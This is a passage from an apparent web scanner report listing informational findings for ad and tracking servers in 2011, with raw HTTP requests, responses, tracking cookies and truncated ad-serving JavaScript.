Set-Cookie: ASB164=TX=1304955461&D10=&D6=&D8=&D1=&D3=&Pb=104&A=8&SID=9996D17BE9434FAF86AAA6900B6D6F82&D4=&Vn=1423&Ct=0&Pc=0&D5=&S=&Cn=200&Pd=0&D9=&D2=&T=588064&Cr=71712&D7=&W=72461&Tr=72461&Cp=2248&P=1559799&B=164; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: ATV164=15920d163AJLc68c268c1FJ7Nc38c1CFc2610cHU90cc26ODc8ccc26ODcccccccccccccc; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: VCC164=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: BTASES=SID=89BD0AAD619444D2AFEC01012356111B; path=/
Set-Cookie: BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6; expires=Thu, 03-May-2012 04:00:00 GMT; path=/
Date: Mon, 09 May 2011 15:37:40 GMT
Connection: close
Content-Length: 4022

<script language=Javascript src="/ads_v2/script/btwrite.js"></script>
<SCRIPT LANGUAGE=Javascript>function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf
...[SNIP]...

24.8. http://ads.bridgetrack.com/ads_v2/script/btwrite.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /ads_v2/script/btwrite.js

Request

GET /ads_v2/script/btwrite.js HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://ads.bridgetrack.com/a/f/?BT_CON=200&BT_PID=1559799&r=1748565961&click=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjmhuQgrITdiEBbK9sQf_qZXkD4OtlZQCs5_thR3AjbcB0PalBBABGAEggqrzDjgAUJOPk9T6_____wFgyYaFiYikhBCgAb3klNsDsgETd3d3LnRoZXJlcHVibGljLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA%26num%3D1%26sig%3DAGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ%26client%3Dca-pub-8560941387472259%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA144=; ASB164=TX=1304955461&D10=&D6=&D8=&D1=&D3=&Pb=104&A=8&SID=D59645850CE345599D5D3B6C8708440E&D4=&Vn=1423&Ct=0&Pc=0&D5=&S=&Cn=200&Pd=0&D9=&D2=&T=592007&Cr=70715&D7=&W=72461&Tr=72461&Cp=2248&P=1559799&B=164; ATV164=42111d163AJLc68c268c1FJ7Nc38c1CFc251RcI247cc26ODc8ccc26ODcccccccccccccc; BTASES=SID=BB336BA18EEA40CF862F97746AD6F63F; BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400,public
Content-Type: text/html
Expires: Tue, 10 May 2011 15:37:41 GMT
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:37:41 GMT
Connection: close
Content-Length: 49


function BTWrite( s )
{
document.write(s);
}

24.9. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Request

GET /PortalServe/?pid=1233308J95620110310212114&flash=10&time=1|10:35|-5&redir=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBEgMLqgnITYDyDaXRlQfxr83UCKTwo_oBvMa13hvAjbcBABABGAEgjfDlBTgAYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEFmALADLgCGMgC5In4GeACAOoCDjMwMHgyNTBCX01vbmV5kAOkA5gD4AOoAwHoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB%26num%3D1%26sig%3DAGiWqtyodj_3eco2oOZOH11No0LN9ZNq6g%26client%3Dca-pub-6743622525202572%26adurl%3D$CTURL$&r=0.18015406071208417 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CFJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAe; PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR; PRimp=D9A20400-8E82-28EE-0209-AFE0003E0200; PRca=|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:35:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4400
Set-Cookie:PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmVlODIAEcCDe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D9A20400-9495-C8E0-0309-8D40011C0203; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKLC*1774:1|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKLCAA2c:1|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FKqE:1|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKwo:1|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FKqEGKwo:1|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

24.10. http://amch.questionmarket.com/adscgen/sta.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Request

GET /adscgen/sta.php?survey_num=887938&site=2320695&code=4862365&ut_sys=eb HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:40:00 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
DL_S: b202.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 168
Content-Type: text/html

(function(){
if(1!=4){
(new Image).src="http://amch.questionmarket.com/adsc/d887938/3/500004862365/decide.php?ord="+Math.floor((new Date()).getTime()/1000);


}
})();


24.11. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

Request

GET /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI|U107OK; PizzaHut=ZapTrader; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 244
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5345525d5f4f58455e445a4a423660;path=/;httponly

<SCRIPT TYPE="text/javascript" language="JavaScript">
var B3d=new Date();
var B3m=B3d.getTime();
B3d.setTime(B3m+30*24*60*60*1000);
document.cookie="ATTWired=ZapTrader;expires="+B3d.toGMTString()+
...[SNIP]...

24.12. http://bidder.mathtag.com/iframe/notify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1304791875; ts=1304949603

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:16 GMT
Set-Cookie: mt_mop=4:1304955375; domain=.mathtag.com; path=/; expires=Thu, 08 May 2014 15:36:16 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Last-Modified: Mon, 09 May 2011 15:36:12 GMT
x-mm-dbg: won
x-mm-host: ewr-bidder-x6, ewr-bidder-x2
Server: MMBD/3.5.5
Content-Length: 1125
Content-Type: text/html
Connection: keep-alive

<IFRAME SRC="http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=
...[SNIP]...

24.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2363415&PluID=0&w=300&h=250&ord=60643838482108259&ucm=true&ncu=$$http://pixel.mathtag.com/click/img?mt_aid=60643838482108259&mt_id=112711&mt_adid=100341&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://www.mediamath.com$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82MDY0MzgzODQ4MjEwODI1OS8xMTI3MTEvMTAxNzc4LzQvX2ZrTzhjMkc0aHVUREhNaTB2REd4bUZyWW93T240Z0pWR3dZWGlIQ3JTby8/wx5pTXc5IEg4EhGauv_ZowQal6A&price=TcgKYwADH_oK5XtBnK9ekEmaWNoad9RlH1xSlQ&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBkRfnYwrITfq_DMH2lQeQvb3lCdzvj_EB-PbyvBGErMGhDwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHg6pnsA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBSWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzcy8yMDExLzA1MDkvR2FzLXByaWNlcy1zdGFydC10by1oZWFkLWRvd26YAugHwAIEyALWwYwO4AIA6gIQMzAweDI1MENfR2VuZXJhbKgDAegD9AnoA5MF6AORA_UDAAQARPUDIAAAAOAEAYAGgIqNvobDucuOAQ%26num%3D1%26sig%3DAGiWqtzdUBy3-sRSj_5-4w3QHutXcJep2g%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag; A3=jlP8aJjE0dpH00001juYhaL6r07Kl00001jBofaIOs07Si00001jAsGaJH602WG00003; B3=9wtb0000000001ur8Whx0000000003uu9oDg0000000001ut98nW0000000001uy

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jlP8aJjE0dpH00001iRpfaL7W0c9M00001juYhaL6q07Kl00001jAsGaJH602WG00003jBofaIOs07Si00001; expires=Sun, 07-Aug-2011 11:38:52 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8Whx0000000003uu9wtb0000000001ur9oDg0000000001ut910n0000000001uy98nW0000000001uy; expires=Sun, 07-Aug-2011 11:38:52 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 09 May 2011 15:38:51 GMT
Connection: close
Content-Length: 2338

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

24.14. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.groupon.com/subscriptions/new?utm_source=mbe&utm_medium=cpc&utm_campaign=q4&utm_content=2s208&p={site}&a=Banner&s=1x1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; _msuuid_4561iuf9g3q501317=389E4AAF-0A51-4C2B-B96D-B96D82DE5465; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 09 May 2011 15:35:38 GMT
Expires: Mon, 09 May 2011 15:35:38 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 1835

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- "Groupon" c/o "
...[SNIP]...

24.15. http://login.npr.org/openid/embed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.npr.org
Path:   /openid/embed

Request

GET /openid/embed?token_url=http%3A%2F%2Fwww.npr.org%2Ftemplates%2Freg%2Flogin-janrain-submit.php HTTP/1.1
Host: login.npr.org
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; s_cc=true; s_sq=nprorg%3D%2526pid%253D136128917-Mississippi%252520River%252520Could%252520Crest%252520Monday%252520At%252520Memphis%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.npr.org/%25253Futm_source%25253Dtopnav%252526utm_medium%25253Dtopnav%252526utm_campaign%25253Dtopnav%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:39:49 GMT
Content-Type: text/html
Last-Modified: Thu, 05 May 2011 02:07:43 GMT
Connection: keep-alive
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 4792

<!DOCTYPE html>
<html dir="ltr" >
<head>
<title>Sign in - Powered by Janrain</title>
<meta charset="UTF-8" />

<script src="https://s3.amazonaws.com/static.rpxnow.com/js/lib/rpx.js" type
...[SNIP]...

24.16. http://odb.outbrain.com/utils/ping.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/ping.html

Request

GET /utils/ping.html?random=0.5672100060619414 HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; tick=1304954969218; _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJurT0dWeqNOpcg=="; _lvd2=27vfag1ZPzfDGaK+UsDEF+7sgWSAHBie; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Thu, 03-May-2012 15:36:48 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
ETag: W/"158-1304265382000"
Last-Modified: Sun, 01 May 2011 15:56:22 GMT
Content-Type: text/html
Content-Length: 158
Date: Mon, 09 May 2011 15:36:48 GMT

<html>
   <head>
       <META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
       <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
   </head>
   <body>
   </body>
</html>

24.17. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7108-2.html

Request

GET /a/4462/5032/7108-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
